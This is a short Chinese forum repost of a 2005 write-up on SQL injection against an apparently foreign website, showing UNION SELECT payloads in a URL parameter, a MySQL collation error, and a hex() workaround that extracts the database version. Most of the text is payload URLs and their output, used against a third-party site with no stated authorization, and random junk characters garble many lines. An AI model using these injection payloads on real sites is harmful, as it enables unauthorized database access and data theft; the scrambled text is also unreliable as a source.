本文作者:SuperHei
Y$ _1 S ^# B5 x, N& ^5 N文章性质:原创. x+ e: Q7 L v" z$ z& \' K, H7 f
发布日期:2005-10-18
4 }5 [! [4 r- o& b* O. {# S+ k7 _测试个国外的站时:
8 T/ d; C( W$ i8 H$ M8 ^1 rurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*5 w1 Z; D# O# u) S
返回错误:
% X9 M( [# y7 X! sIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
% A) \7 _5 i4 A# e) h8 XMySQL Error No. 126
1 m. c; `$ n$ |8 L看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
: L' S+ m0 E6 m3 A2 Z解决办法:转为其他编码如hex。 l) _: T5 Z# M: A+ H9 H" I
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*6 K5 `9 E4 v" e8 C( H0 k, f- I6 u
成功得到hex(version())的值为:! m! h1 v+ v A' p0 O b* J
342E312E332D62657461
3 ]$ F$ d; X8 q0 O& \3 U$ V回Mysql查询下得到:; c: @$ G. o; i- O
mysql> select 0x342E312E332D62657461;1 d& W$ Z; J2 i5 g1 t# S9 x
+------------------------+
# S+ H. m" q3 z8 H( Q5 `* P| 0x342E312E332D62657461 |
. W. y( v5 y6 a& `+------------------------+' k1 J; R2 z/ I! \6 g9 X
| 4.1.3-beta |" V0 E2 k, ~. r, ^& I# E z& R
+------------------------+
$ L Z+ e% Q# V; [# K1 row in set (0.00 sec)
, e( F. v9 P' C; m; @
3 _# ?1 l- h5 H6 ? |
发表于 2012-9-15 14:04:54
收藏
支持
反对